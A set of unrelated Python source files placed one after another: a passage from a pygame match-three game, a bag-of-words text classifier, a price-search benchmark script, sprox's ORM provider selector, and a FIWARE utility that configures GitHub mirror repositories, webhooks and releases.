                        Sounds.eliminate(3) # Elimination sound 3
                        self.change_down(i, j, 3)
                        self.change_left(i+1, j, 3)
                    elif self.exists_right(i+1, j, 3):
                        self.animal_num[self.animal[i][j]] += 5
                        Sounds.eliminate(3) # Elimination sound 3
                        self.change_down(i, j, 3)
                        self.change_right(i+1, j, 3)
                    elif self.exists_left(i+2, j, 3):
                        self.animal_num[self.animal[i][j]] += 5
                        Sounds.eliminate(3) # Elimination sound 3
                        self.change_down(i, j, 3)
                        self.change_left(i+2, j, 3)
                    elif self.exists_right(i+2, j, 3):
                        self.animal_num[self.animal[i][j]] += 5
                        Sounds.eliminate(3) # Elimination sound 3
                        self.change_down(i, j, 3)
                        self.change_right(i+2, j, 3)
                    elif self.exists_left(i+2, j, 2) and self.exists_right(i+2, j, 2):
                        self.animal_num[self.animal[i][j]] += 5
                        Sounds.eliminate(3) # Elimination sound 3
                        self.change_down(i, j, 3)
                        self.change_left(i+2, j, 2)
                        self.change_right(i+2, j, 2)
                    elif self.exists_left(i+2, j, 2) and self.exists_right(i+2, j, 3):
                        self.animal_num[self.animal[i][j]] += 6
                        Sounds.eliminate(4) # Elimination sound 4
                        self.change_down(i, j, 3)
                        self.change_left(i+2, j, 2)
                        self.change_right(i+2, j, 3)
                    elif self.exists_left(i+2, j, 3) and self.exists_right(i+2, j, 2):
                        self.animal_num[self.animal[i][j]] += 6
                        Sounds.eliminate(4) # Elimination sound 4
                        self.change_down(i, j, 3)
                        self.change_left(i+2, j, 3)
                        self.change_right(i+2, j, 2)
                    elif self.exists_left(i+2, j, 3) and self.exists_right(i+2, j, 3):
                        self.animal_num[self.animal[i][j]] += 7
                        Sounds.eliminate(5) # Elimination sound 5
                        self.change_down(i, j, 3)
                        self.change_left(i+2, j, 3)
                        self.change_right(i+2, j, 3)
                    else:
                        self.animal_num[self.animal[i][j]] += 3
                        Sounds.eliminate(1) # Elimination sound 1
                        self.change_down(i, j, 3)
        self.fall_animal()
        score_level = self.score - score_level # Score level
        # Display & speak: good, great, amazing, excellent, unbelievable
        if score_level < 5:
            return self.value_swapped
        if score_level < 8: # 5 good
            Sounds.score_level(0)
            Element(Element.score_level[0], (350, 250)).draw(self.screen)
            pygame.display.flip()
            delay(500)
        elif score_level < 10: # 8 great
            Sounds.score_level(1)
            Element(Element.score_level[1], (350, 250)).draw(self.screen)
            pygame.display.flip()
            delay(500)
        elif score_level < 15: # 10 amazing
            Sounds.score_level(2)
            Element(Element.score_level[2], (350, 250)).draw(self.screen)
            pygame.display.flip()
            delay(500)
        elif score_level < 20: # 15 excellent
            Sounds.score_level(3)
            Element(Element.score_level[3], (350, 250)).draw(self.screen)
            pygame.display.flip()
            delay(500)
        elif score_level >= 20: # 20 unbelievable
            Sounds.score_level(4)
            Element(Element.score_level[4], (350, 250)).draw(self.screen)
            pygame.display.flip()
            delay(500)
        return self.value_swapped # Return the swap value sign
    def fall_animal(self): # pylint: disable=too-many-locals
        '''Animation of falling animals.

        Plays the pop/ice-break effects for cells marked -2, then drops the
        animals above into the holes column by column, spawning new random
        animals at the top.
        '''
        clock = pygame.time.Clock()
        position = []
        ice_position = []
        for i in range(self.row, self.row + self.height):
            for j in range(self.col, self.col + self.width):
                if self.animal[i][j] == -2:
                    x, y = self.rc_xy(i, j)
                    position.append((x, y))
                    if self.ice_list[i][j] == 1:
                        ice_position.append((x, y))
        if position:
            # 9-frame pop animation over all eliminated cells.
            for index in range(0, 9):
                clock.tick(20)
                for pos in position:
                    self.draw_brick(pos[0], pos[1])
                    if pos in ice_position:
                        Element(Element.ice_format%index, (pos[0], pos[1])).draw(self.screen)
                    Element(Element.bling_format%index, (pos[0], pos[1])).draw(self.screen)
                pygame.display.flip()
        for i in range(self.row, self.row + self.height):
            brick_position = []
            fall_animal_list = []
            speed = [0, 1]
            for j in range(self.col, self.col + self.width):
                if self.animal[i][j] == -2:
                    x, y = self.rc_xy(i, j)
                    if self.ice_list[i][j] == 1:
                        # Eliminating on an iced cell breaks the ice.
                        play_sound(Sounds.ICE_BREAKING)
                        self.ice_num += 1
                        self.ice_list[i][j] = -1
                    brick_position.append((x, y))
                    # Shift every animal above this hole down one row.
                    for m in range(i, self.row - 1, -1):
                        if self.animal[m - 1][j] != -1:
                            x, y = self.rc_xy(m - 1, j)
                            brick_position.append((x, y))
                            animal = Element(Element.animals[self.animal[m - 1][j]], (x, y))
                            fall_animal_list.append(animal)
                            self.animal[m][j] = self.animal[m - 1][j]
                        else:
                            # Reached the top edge: spawn a new animal.
                            self.animal[m][j] = randint(0, 5)
                            break
            while speed != [0, 0] and fall_animal_list:
                for position in brick_position:
                    self.draw_brick(position[0], position[1])
                for animal_sprite in fall_animal_list:
                    animal_sprite.move(speed)
                    animal_sprite.draw(self.screen)
                    speed = animal_sprite.speed
                pygame.display.flip()
    def judge_next(self, tp, score):
        '''Check whether the next level is reached or not'''
        if tp == 1: # Passed
            self.load_fns_window(score)
        elif tp == -1: # Failed
            self.load_fail_window()
    def load_fail_window(self):
        '''Display the failure board and buttons'''
        sound_sign = 0
        step_add = Board(Board.step_add, Board.button_position[0]) # L: 5 more steps
        retry = Board(Board.replay, Board.button_position[1]) # R: Replay
        self.screen.blit(self.fail_board.image, self.fail_board.rect) # Failure board
        self.screen.blit(step_add.image, step_add.rect)
        self.screen.blit(retry.image, retry.rect)
        # Slide the board in; play the sound once on the first frame.
        while self.fail_board.speed != [0, 0]:
            self.draw()
            self.screen.blit(self.fail_board.image, self.fail_board.rect)
            self.fail_board.move()
            pygame.display.flip()
            if sound_sign == 0:
                play_sound(Sounds.BOARD_SOUND)
                sound_sign = 1
    def load_fns_window(self, score):
        '''Display the success board, score and buttons'''
        sound_sign = 0
        replay = Board(Board.replay, Board.button_position[0]) # L: Replay
        self.screen.blit(self.success_board.image, self.success_board.rect) # Successful board
        if self.level < 10: # If not the last level
            next_level = Board(Board.next, Board.button_position[1]) # R: Next level
            self.screen.blit(next_level.image, next_level.rect)
        self.screen.blit(replay.image, replay.rect)
        while self.success_board.speed != [0, 0]:
            self.draw()
            self.screen.blit(self.success_board.image, self.success_board.rect)
            self.success_board.move()
            pygame.display.flip()
            if sound_sign == 0:
                play_sound(Sounds.BOARD_SOUND)
                sound_sign = 1
        self.displayStars(score) # Display the stars
        # Money
        # NOTE(review): the y-coordinate uses starts_position[0][0] twice;
        # the second index looks like it should be [0][1] — confirm.
        self.load_text(str(self.score*2), (Board.starts_position[0][0]+75, Board.starts_position[0][0]+46), 20, (0, 0, 0))
    def displayStars(self, score):
        '''Display the stars according to the score.'''
        star1 = Board(Board.stars, Board.starts_position[0])
        star2 = Board(Board.stars, Board.starts_position[1])
        star3 = Board(Board.stars, Board.starts_position[2])
        if 0 <= score < self.min:
            self.load_text('1', (Board.starts_position[1][0]+48, Board.starts_position[1][1]+35), 20, (0, 0, 0))
            self.screen.blit(star1.image, star1.rect)
        elif self.min <= score <= self.max:
            self.load_text('2', (Board.starts_position[1][0] + 48, Board.starts_position[1][1] + 35), 20, (0, 0, 0))
            self.screen.blit(star1.image, star1.rect)
            self.screen.blit(star2.image, star2.rect)
        elif score > self.max:
            # NOTE(review): label says '5' while three stars are shown —
            # '3' may have been intended; confirm against game design.
            self.load_text('5', (Board.starts_position[1][0] + 48, Board.starts_position[1][1] + 35), 20, (0, 0, 0))
            self.screen.blit(star1.image, star1.rect)
            self.screen.blit(star2.image, star2.rect)
            self.screen.blit(star3.image, star3.rect)
        pygame.display.flip()
    def set_level_mode(self, level):
        '''Set the level mode and its steps.

        Rebuilds the board layout (holes and ice) for *level*, deducts the
        5-energy entry fee, and resets the per-level counters.  Only runs
        when ``reset_mode`` is set.
        '''
        self.level = level
        if self.reset_mode: # If it is required to reset the mode
            self.num_sign = True
            if level == 1:
                self.__init__(7, 7)
                # Carve the level's fixed holes (absolute grid coordinates).
                self.animal[7][9] = self.animal[7][10] = self.animal[7][11] = self.animal[8][10] = self.animal[11][7] = \
                    self.animal[11][13] = self.animal[12][7] = self.animal[12][8] = self.animal[12][12] = self.animal[12][13] = \
                    self.animal[13][7] = self.animal[13][8] = self.animal[13][9] = self.animal[13][11] = self.animal[13][12] = \
                    self.animal[13][13] = -1
                self.init_step = 17 # 17 initial steps
            elif level == 2:
                self.__init__(4, 8)
                self.init_step = 16 # 16 initial steps
            elif level == 3:
                self.__init__(7, 7)
                self.init_step = 18 # 18 initial steps
            elif level == 4:
                self.__init__(9, 7)
                row, col = self.row, self.col
                self.animal[row][col] = self.animal[row][col+7] = self.animal[row][col+8] = self.animal[row+1][col+8] = \
                    self.animal[row+5][col] = self.animal[row+6][col] = self.animal[row+6][col+1] = self.animal[row+6][col+8] = -1
                self.init_step = 20
            elif level == 5:
                self.__init__(8, 9)
                row, col = self.row, self.col
                self.animal[row][col+7] = self.animal[row+2][col] = self.animal[row+5][col] = self.animal[row+3][col+7] = \
                    self.animal[row+6][col+7] = self.animal[row+8][col] = -1
                self.init_step = 20
            elif level == 6:
                self.__init__(9, 9)
                row, col = self.row, self.col
                self.animal[row][col] = self.animal[row][col+8] = self.animal[row+2][col+4] = self.animal[row+3][col+2] = \
                    self.animal[row+3][col+6] = self.animal[row+8][col] = self.animal[row+8][col+8] = -1
                for i in range(row+4, row+6):
                    for j in range(col+3, col+6):
                        self.animal[i][j] = -1
                self.init_step = 28
            elif level == 7:
                self.__init__(9, 9)
                row, col = self.row, self.col
                for i in range(row, row + 9):
                    self.animal[i][col+4] = -1
                for j in range(col, col+4):
                    self.animal[row+3][j] = -1
                for j in range(col+5, col+9):
                    self.animal[row+5][j] = -1
                self.init_step = 25
            elif level == 8:
                self.__init__(7, 8)
                row, col = self.row, self.col
                for i in range(row+2, row+5):
                    for j in range(col+1, col+6):
                        self.ice_list[i][j] = 1
                self.init_step = 21
            elif level == 9:
                self.__init__(9, 9)
                row, col = self.row, self.col
                self.animal[row][col+4] = self.animal[row+4][col] = self.animal[row+4][col+8] = self.animal[row+8][col+4] = -1
                for i in range(row+1, row+8):
                    for j in range(col+1, col+8):
                        self.ice_list[i][j] = 1
                self.init_step = 35
            else:
                self.__init__(9, 9)
                row, col = self.row, self.col
                for i in range(row, row+2):
                    for j in range(col, col+9):
                        self.animal[i][j] = -1
                self.animal[row][col+4] = randint(0, 5)
                self.animal[row+1][col+2] = randint(0, 5)
                self.animal[row+1][col+4] = randint(0, 5)
                self.animal[row+1][col+6] = randint(0, 5)
                self.animal[row+2][col+1] = self.animal[row+3][col+1] = self.animal[row+2][col+3] = self.animal[row+3][col+3] =\
                    self.animal[row+2][col+5] = self.animal[row+3][col+5] = self.animal[row+2][col+7] = \
                    self.animal[row+3][col+7] = self.animal[row+8][col] = self.animal[row+8][col+8] = -1
                for i in range(row+4, row+8):
                    for j in range(col, col+9):
                        self.ice_list[i][j] = 1
                self.ice_list[row+2][col+4] = self.ice_list[row+3][col+2] = self.ice_list[row+3][col+4] = \
                    self.ice_list[row+3][col+6] = 1
                self.init_step = 40
            self.type = 0
            self.energy_num -= 5
            self.success_board = Board(Board.success, [200, 0]) # Success board
            self.fail_board = Board(Board.fail, [200, 0]) # Failure board
            self.step = self.init_step
            self.score = 0
            self.animal_num = [0, 0, 0, 0, 0, 0]
            self.ice_num = 0
            self.reset_mode = False
    def num_add(self):
        '''Grant the end-of-level rewards (money and energy) exactly once.'''
        if self.num_sign:
            self.money += self.score * 2
            if self.score < self.min:
                self.energy_num += 1
            elif self.score < self.max:
                self.energy_num += 2
            else:
                self.energy_num += 5
            self.num_sign = False
    def judge_level(self):
        '''Check whether the level was passed.

        Each level has a fixed goal (animal counts or broken ice); when it
        is met ``type`` flips to 1 and rewards are granted.  Running out of
        steps first sets ``type`` to -1.
        '''
        if self.step <= 0:
            self.type = -1 # Game over
        if self.level == 1:
            if self.animal_num[4] >= 10: # L1: 10 frogs
                self.type = 1 # Level 1 passed
                self.num_add()
        elif self.level == 2:
            if self.animal_num[1] >= 21: # L2: 21 bears
                self.type = 1 # Level 2 passed
                self.num_add()
        elif self.level == 3:
            if self.animal_num[4] >= 16 and self.animal_num[5] >= 16: # L3: 16 frogs and 16 cows
                self.type = 1 # Level 3 passed
                self.num_add()
        elif self.level == 4:
            if self.animal_num[5] >= 18 and self.animal_num[2] >= 18: # L4: 18 cows and 18 chicks
                self.type = 1 # Level 4 passed
                self.num_add()
        elif self.level == 5:
            if self.animal_num[2] >= 28 and self.animal_num[0] >= 28: # L5: 28 chicks and 28 foxes
                self.type = 1 # Level 5 passed
                self.num_add()
        elif self.level == 6:
            if self.animal_num[4] >= 70: # L6: 70 frogs
                self.type = 1 # Level 6 passed
                self.num_add()
        elif self.level == 7:
            if self.animal_num[2] >= 36 and self.animal_num[1] >= 36 and self.animal_num[0] >= 36: # L7: 36 chickens, 36 bears and 36 foxes
                self.type = 1 # Level 7 passed
                self.num_add()
        elif self.level == 8:
            if self.ice_num >= 15: # L8: 15 ice
                self.type = 1 # Level 8 passed
                self.num_add()
        elif self.level == 9:
            if self.ice_num >= 49: # L9: 49 ice
                self.type = 1 # Level 9 passed
                self.num_add()
        else:
            if self.ice_num >= 39: # L10: 39 ice
                self.type = 1 # Level 10 passed
                self.num_add()
        self.judge_next(self.type, self.score)
|
from collections import Counter
from numpy import log
from sklearn.base import BaseEstimator, ClassifierMixin
from data.data_examination import make_sig_words
from data.pipelines import (tokenize_pipe,
lower_pipe,
stem_pipe,
lemmatize_pipe)
class ProbabilisticClassifier(BaseEstimator, ClassifierMixin):
    """Naive-Bayes-style bag-of-words text classifier.

    Two scoring modes:

    * default: per-label word counts (``counterTable``) are converted to
      log relative frequencies (``logTable``); words unseen for a label
      contribute 0 (no smoothing).
    * ``beta_method``: significance weights produced by ``make_sig_words``
      are used instead, and words unseen for a label are penalised with
      that label's minimum log-weight (``miss_p``).

    Parameters
    ----------
    log_table, counter_table : dict or None
        Pre-populated model tables; fresh empty dicts are created when
        omitted (mutable defaults are deliberately avoided).
    beta_method : bool
        Select the significance-weight scoring mode.
    stem, lemma : bool
        Enable stemming / lemmatization in the preprocessing pipeline.
    """

    def __init__(
            self,
            log_table=None,
            counter_table=None,
            beta_method=False,
            stem=False,
            lemma=False):
        """
        Called when initializing the classifier
        """
        if counter_table is None:
            counter_table = {}
        if log_table is None:
            log_table = {}
        self.counterTable = counter_table
        self.logTable = log_table
        self.beta_method = beta_method
        self.stem = stem
        self.lemma = lemma

    def _preprocess(self, sentences):
        """Lower-case, tokenize and optionally stem/lemmatize *sentences*."""
        piped = tokenize_pipe(lower_pipe(sentences))
        if self.stem:
            piped = stem_pipe(piped)
        if self.lemma:
            piped = lemmatize_pipe(piped)
        return piped

    def fit(self, sentences, labels):
        """Fit per-label word scores from parallel *sentences*/*labels*.

        Returns ``self`` (scikit-learn estimator contract).
        """
        distinct_labels = set(labels)
        if self.beta_method:
            for label in distinct_labels:
                self.logTable[label] = {}
            # Group the raw sentences by label for the significance-word
            # helper (which expects tokenized, lower-cased input).
            s_by_a = {a:
                      [s for s, a1 in zip(sentences, labels) if a1 == a]
                      for a in distinct_labels}
            tok_s_by_a = {
                k:
                list(tokenize_pipe(lower_pipe(v))) for k, v in s_by_a.items()}
            beta_table = make_sig_words(
                stem=self.stem,
                lemma=self.lemma,
                other_data=tok_s_by_a)
            self.beta_table = beta_table
            for label in beta_table:
                for w in beta_table[label]:
                    self.logTable[label][w] = log(beta_table[label][w])
            # Miss penalty: the worst (lowest) log-weight seen per label.
            self.miss_p = {label: min(self.logTable[label].values())
                           for label in distinct_labels}
            self.trained_ = True
            return self
        for label in distinct_labels:
            self.counterTable[label] = Counter()
        for sentence, label in zip(self._preprocess(sentences), labels):
            for w in sentence:
                self.counterTable[label][w] += 1
        for label in distinct_labels:
            ctr = self.counterTable[label]
            total = sum(ctr.values())
            self.logTable[label] = {w: log(c / total) for w, c in ctr.items()}
        self.trained_ = True
        return self

    def score_(self, w, l):
        """Log-score of word *w* under label *l* (penalty/0 when unseen)."""
        if self.hit_(w, l):
            return self.logTable[l][w]
        # NOTE: default mode applies no smoothing — unseen words score 0.
        return self.miss_p[l] if self.beta_method else 0

    def hit_(self, w, l):
        """True if word *w* was observed for label *l* during fit."""
        return w in self.logTable[l]

    def predict(self, x):
        """Predict one label per sentence in *x*.

        Raises RuntimeError if called before :meth:`fit`.
        """
        if not hasattr(self, 'trained_'):
            raise RuntimeError('You must train the classifier before using it')
        return [self.predict_sen_(s) for s in self._preprocess(x)]

    def predict_sen_(self, s):
        """Pick the best label for one tokenized sentence *s*."""
        labels = list(self.logTable.keys())
        scores = [sum(self.score_(w, l) for w in s) for l in labels]
        if self.beta_method:
            return labels[scores.index(max(scores))]
        hits = [sum(self.hit_(w, l) for w in s) for l in labels]
        # Among the labels that matched the most words, take the highest
        # score.  BUG FIX: compare counts with ==, not identity (`is`),
        # which only appeared to work via CPython's small-int caching.
        maxhits = max(hits)
        candidates = [(score, label)
                      for score, hit, label in zip(scores, hits, labels)
                      if hit == maxhits]
        return max(candidates, key=lambda pair: pair[0])[1]
|
import pandas
import pdb
import matplotlib
import numpy as np
#matplotlib.use('Agg')
#import matplotlib.pyplot as plt
import glob
import sys
#from matplotlib.ticker import MultipleLocator
import json
import os
import math
import random
import time
import BO_functions
from termcolor import colored
import subprocess
from joblib import Parallel, delayed
import multiprocessing
from pathlib import Path
# Workloads evaluated by the gradient-descent search below.
models = ['candle', 'resnet', 'vgg', 'mtwnd', 'dien']
# Per-model homogeneous-cluster configuration (schema defined by
# configs/homogeneous.json -- presumably instance counts; confirm against
# BO_functions.total_price usage below).
with open('configs/homogeneous.json') as f:
    homo_key = json.load(f)
# Per-model list of target cost savings (percent) vs the homogeneous price.
with open('configs/saving.json') as f:
    saving = json.load(f)
num_iter = 100  # number of Monte-Carlo trials per model
def check_step(gd, data, current_iter):
    """Record which still-unreached price targets the search has now hit.

    *data* maps price target -> iteration at which it was first reached
    (0 meaning "not yet reached").  Mutates and returns *data*.
    """
    best = gd.best_price
    unreached = [target for target, hit_at in data.items() if hit_at == 0]
    for target in unreached:
        if best <= target:
            data[target] = current_iter
    return data
def inner_loop(iteration, prices):
    """Run one Monte-Carlo trial of the gradient-descent search.

    Seeds the search with *iteration*, iterates until the optimal price is
    reached, and returns [data, qos_rate, cost] where *data* maps each
    price target to the iteration count at which it was first reached.

    NOTE(review): relies on the module-level globals `model`, `remain` and
    `optimal` assigned by the driver loop below.
    """
    print(f'trial: {iteration}')
    BO_functions.model = model
    data = {}  # price target -> number of iterations needed to reach it
    for j in prices:
        # each price is associated with the number of samples to reach it
        data[j] = 0
    gd = BO_functions.GradientDescent(remain, seed=iteration)
    total_space = len(gd.remain)
    starting_point = gd.get_sp()
    gd.initialize(starting_point)
    current_iter = 0
    data = check_step(gd, data, current_iter)
    while data[optimal] == 0:
        # note: this local num_iter shadows the module-level num_iter
        num_iter = gd.iterate()
        current_iter += num_iter
        data = check_step(gd, data, current_iter)
    # Sanity check: every configuration is either explored or still remaining.
    if current_iter + len(gd.remain) != total_space - 1: # minus one initialization point
        print('error with trial counting')
        sys.exit()
    targets = gd.rate_history
    # Count explored samples meeting the QoS bound (rate <= 99).
    within_qos = [k for k in targets if k <= 99]
    qos_rate = len(within_qos)# / len(targets) * 100
    explored_points = gd.config_history
    # Mean price over all explored configurations.
    cost = np.mean([BO_functions.total_price(model, *p) for p in explored_points])
    return [data, qos_rate, cost]
# Cap parallelism at the set of CPUs this process is allowed to use.
usable_cores = os.sched_getaffinity(0)
for model in models:
    BO_functions.model = model
    xmax, ymax, zmax = BO_functions.max_instance(model)
    pbounds = {'x': (0, xmax), 'y': (0, ymax), 'z': (0, zmax)}
    # Enumerate the full (x, y, z) configuration space for this model.
    remain = []
    for x in range(0, xmax+1):
        for y in range(0, ymax+1):
            for z in range(0, zmax+1):
                point = x, y, z
                remain.append(point)
    # Homogeneous baseline price, then the heterogeneous price targets
    # implied by each desired saving percentage.
    homo_p = BO_functions.total_price(model, homo_key[model], 0, 0)
    saving_arr = np.array(saving[model][::-1])
    hetero_p = homo_p * (1 - saving_arr / 100)
    prices = [round(val,2) for val in hetero_p]
    optimal = min(prices)
    # record number of samples needed to reach the score
    summary = {}
    qos_rate = []
    cost = []
    for j in prices:
        summary[j] = []
    # One Monte-Carlo trial per seed, fanned out across the usable cores.
    results = Parallel(n_jobs=len(usable_cores))(delayed(inner_loop)(i,prices) for i in range(num_iter))
    for result in results:
        qos_rate.append(result[1])
        cost.append(result[2])
        for j in prices:
            ind = prices.index(j)
            summary[prices[ind]].append(result[0][j])
    # Persist per-model results for the BO comparison.
    Path("../BO/result/qos_rate").mkdir(parents=True, exist_ok=True)
    Path("../BO/result/cost").mkdir(parents=True, exist_ok=True)
    with open(f'../BO/result/{model}_gradient.json', 'w') as f:
        json.dump(summary, f, indent=4)
    with open(f'../BO/result/qos_rate/{model}_gradient.json', 'w') as f:
        json.dump(qos_rate, f, indent=4)
    with open(f'../BO/result/cost/{model}_gradient.json', 'w') as f:
        json.dump(cost, f, indent=4)
|
<filename>sprox/providerselector.py
"""
Provider Locator Module
a module to help dbsprockets automatically find providers
Copyright (c) 2008 <NAME>
Original Version by <NAME> 2007
Released under MIT license.
"""
import inspect
try:
from sqlalchemy import MetaData
from sqlalchemy.engine import Engine
from sqlalchemy.orm import _mapper_registry, class_mapper
from sqlalchemy.orm.session import Session
from sqlalchemy.orm.scoping import ScopedSession
except ImportError: # pragma: no cover
pass
try: #pragma:no cover
from sqlalchemy.orm.instrumentation import ClassManager
except ImportError: #pragma:no cover
try: # pragma: no cover
#sa 0.6- support
from sqlalchemy.orm.attributes import ClassManager
except ImportError:
pass
SAORMProvider = None
try:
from sprox.sa.provider import SAORMProvider
except ImportError: # pragma: no cover
pass
#MongoKitProvider = None
#try:
# from sprox.mk.provider import MongoKitProvider
#except ImportError: # pragma: no cover
# pass
MingProvider = None
MappedClass = None
try:
from sprox.mg.provider import MingProvider
try:
from ming.odm.declarative import MappedClass
except ImportError: #pragma: no cover
from ming.orm.declarative import MappedClass
except ImportError: # pragma: no cover
pass
from sprox.dummyentity import DummyEntity
class ProviderSelector:
    """Abstract interface for locating providers and entities for an ORM.

    Concrete selectors implement the lookup methods; this base supplies
    each instance with empty identifier/entity caches.
    """

    def __init__(self):
        self._identifiers = {}
        self._entities = {}

    def get_entity(self, name, **hints):
        """Return the mapped class registered under *name*."""
        raise NotImplementedError

    def get_identifier(self, entity, **hints):
        """Return the canonical string identifier for *entity*."""
        raise NotImplementedError

    def get_provider(self, entity, **hints):
        """Return a provider instance able to serve *entity*."""
        raise NotImplementedError
#class _MongoKitSelector(ProviderSelector):
# def get_identifier(self, entity, **hints):
# return entity.__name__
# def get_provider(self, entity=None, hint=None, **hints):
# #TODO cache
# return MongoKitProvider(None)
class _MingSelector(ProviderSelector):
    """Selector for Ming (MongoDB) mapped classes."""

    def get_provider(self, entity=None, hint=None, **hints):
        # TODO: cache providers per session, like _SAORMSelector does.
        session = entity.__mongometa__.session
        return MingProvider(session)
class _SAORMSelector(ProviderSelector):
    """Selector for SQLAlchemy ORM entities.

    Providers are cached per engine so repeated lookups are cheap.
    """

    def __init__(self):
        # engine -> SAORMProvider cache
        self._providers = {}

    def _get_engine(self, hint, hints):
        """Derive an Engine from an explicit *hint* object or from the
        metadata/engine/session keyword hints."""
        metadata = hints.get('metadata', None)
        engine = hints.get('engine', None)
        session = hints.get('session', None)

        if isinstance(hint, Engine):
            engine = hint
        if isinstance(hint, MetaData):
            metadata = hint
        if isinstance(hint, (Session, ScopedSession)):
            session = hint

        # Fall back from session to metadata when no engine was given.
        if session is not None and engine is None:
            engine = session.bind
        if metadata is not None and engine is None:
            engine = metadata.bind
        return engine

    def get_entity(self, identifier, hint=None, **hints):
        """Find the mapped class named *identifier*.

        When an engine can be derived from the hints, only mappers whose
        first table is bound to that engine are considered.

        Raises KeyError when no matching mapper is registered.
        """
        engine = self._get_engine(hint, hints)
        for mapper in _mapper_registry:
            if mapper.class_.__name__ == identifier:
                if engine is None:
                    return mapper.class_
                if engine is not None and mapper.tables[0].bind == engine:
                    return mapper.class_
        # BUG FIX: the original referenced the undefined names `model_name`
        # and `metadata` here, turning every lookup miss into a NameError.
        raise KeyError('could not find model by the name %s in %s' % (identifier, engine))

    def get_identifier(self, entity, **hints):
        return entity.__name__

    def get_provider(self, entity=None, hint=None, **hints):
        """
        :Arguments:
          Entity
            Mapped class to find a provider for
          hint/hints
            variables sent in to the provider to give more information about
            how the provider connects to the database.

        Get a provider related to the entity.  (They should share the same
        engine.)  The providers are cached so as not to waste
        computation/memory.

        :Usage:

        >>> from sprox.providerselector import SAORMSelector
        >>> provider = SAORMSelector.get_provider(User, session=session)
        >>> str(provider.engine.url.drivername)
        'sqlite'
        """
        if entity is None and isinstance(hint, Engine):
            engine = hint
            if engine not in self._providers:
                self._providers[engine] = SAORMProvider(hint, **hints)
            return self._providers[engine]
        if hint is None and entity is not None:
            mapper = class_mapper(entity)
            hint = mapper.tables[0].bind
        engine = self._get_engine(hint, hints)
        if engine not in self._providers:
            if hint is None and len(hints) == 0:
                hint = engine
            self._providers[engine] = SAORMProvider(hint, **hints)
        return self._providers[engine]
# Module-level singleton selectors shared by all callers.
SAORMSelector = _SAORMSelector()
#MongoKitSelector = _MongoKitSelector()
MingSelector = _MingSelector()
#XXX: other backends were planned but never implemented:
#StormSelector = _StormSelector()
#SOSelector = _SOSelector()
# Raised when no selector knows how to handle a given entity type.
class ProviderTypeSelectorError(Exception):pass
class ProviderTypeSelector(object):
    """Dispatch on an entity's type to pick the matching ProviderSelector."""

    def get_selector(self, entity=None, **hints):
        """Return the selector singleton appropriate for *entity*.

        Raises ProviderTypeSelectorError when no mapping is known.
        """
        # SQLAlchemy-instrumented classes (and sprox's DummyEntity stub).
        sa_manager = getattr(entity, '_sa_class_manager', None)
        if sa_manager is not None and isinstance(sa_manager, ClassManager):
            return SAORMSelector
        if inspect.isclass(entity) and issubclass(entity, DummyEntity):
            return SAORMSelector
        # Ming (MongoDB) declarative classes, when ming is importable.
        if inspect.isclass(entity) and MappedClass is not None and issubclass(entity, MappedClass):
            return MingSelector
        # Other helper definitions would go here.
        raise ProviderTypeSelectorError('Entity %s has no known provider mapping.' % entity)
|
<reponame>FIWARE-Ops/devops.Tools<gh_stars>1-10
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from argparse import ArgumentParser
from json import load, loads, dumps
from os import environ, path
from requests import get, post, patch, delete
# GitHub API endpoint templates.  NOTE(review): passing access_token as a
# query parameter is deprecated by GitHub -- consider the Authorization
# header instead.
url_description = 'https://api.github.com/repos/{}?access_token={}'
url_webhooks = 'https://api.github.com/repos/{}/hooks?access_token={}'
url_release = 'https://api.github.com/repos/{}/releases?page={}&token={}'
# Target URLs of the FIWARE webhook service, keyed by webhook type.
url_webhook = {'mirror': 'https://webhook.fiware.org/close-pull-request',
               'transformer': 'https://webhook.fiware.org/transform'}
headers = {'Content-Type': 'application/json'}
# Description applied to mirror repositories.
description = "This is a mirror repo. Please fork from https://github.com/{}"
def create_webhook(target, webhook):
    """Create a FIWARE webhook of type *webhook* on repository *target*.

    'mirror' hooks fire on pull requests; anything else is treated as a
    'transformer' hook firing on pushes.  Uses the module-level *token*.
    Returns True on HTTP 201, False otherwise.
    """
    payload = {'name': 'web',
               'active': True,
               'events': [],
               'config': {'insecure_ssl': 0,
                          'content_type': 'json'}}
    if webhook == 'mirror':
        payload['config']['url'] = url_webhook['mirror']
        payload['events'].append('pull_request')
    else:
        payload['config']['url'] = url_webhook['transformer']
        payload['events'].append('push')
    resp = post(url_webhooks.format(target, token),
                data=dumps(payload), headers=headers)
    return resp.status_code == 201
def change_parameters(source, target):
    """Rename *target* and mark it as a mirror of *source*.

    Sets the mirror description and disables issues/projects/wiki.
    Returns True on HTTP 200, False otherwise.
    """
    data = {'name': target.split('/')[1],
            'description': description.format(source),
            'has_issues': False,
            'has_projects': False,
            'has_wiki': False}
    data = dumps(data)
    # BUG FIX: the original formatted the URL with the *global* loop variable
    # repo['target'] instead of the `target` parameter, so the function only
    # worked by accident when called from the __main__ loop below.
    resp = patch(url_description.format(target, token), data=data, headers=headers)
    if resp.status_code == 200:
        return True
    return False
def delete_releases(target):
    """Delete every release of repository *target*.

    Pages through the releases API collecting all releases, then deletes
    them one by one, logging each result.  Always returns True.
    """
    page = 0
    releases = list()
    while True:
        resp = get(url_release.format(target, str(page), token))
        if resp.status_code == 200:
            data = loads(resp.text)
            for el in data:
                releases.append(el)
        # BUG FIX: the original tested `'next' not in resp`, which iterates
        # the response *body* (never matching), so pagination always stopped
        # after the first page; it also looped forever on a non-200 status.
        # Pagination links live in resp.links.
        if 'next' not in resp.links:
            break
        page += 1
    if len(releases) > 0:
        for item in releases:
            resp = delete(item['url'] + '?access_token=' + token)
            if resp.status_code == 204:
                print('Release deletion succeeded, ', item['url'])
            else:
                print('Release deletion failed, ', item['url'])
    return True
def delete_webhooks(target):
    """Remove every webhook on *target* that points at webhook.fiware.org.

    Per-hook success/failure is printed; always returns True.
    """
    resp = get(url_webhooks.format(target, token))
    if resp.status_code == 200:
        for hook in loads(resp.text):
            hook_url = hook.get('config', {}).get('url', '')
            if 'webhook.fiware.org' not in hook_url:
                continue
            resp = delete(hook['url'] + '?access_token=' + token)
            if resp.status_code == 204:
                print('Webhook deletion succeeded, ', hook['url'], hook['config']['url'])
            else:
                print('Webhook deletion failed, ', hook['url'])
    return True
if __name__ == '__main__':
    # Auth token must come from the environment; fail fast otherwise.
    if 'TOKEN' in environ:
        token = environ['TOKEN']
    else:
        print('TOKEN not found')
        token = None
        exit(1)

    parser = ArgumentParser()
    parser.add_argument('--transformer', required=True, action='store')
    parser.add_argument('--mirror', required=True, action='store')
    parser.add_argument('--description', action='store_true')
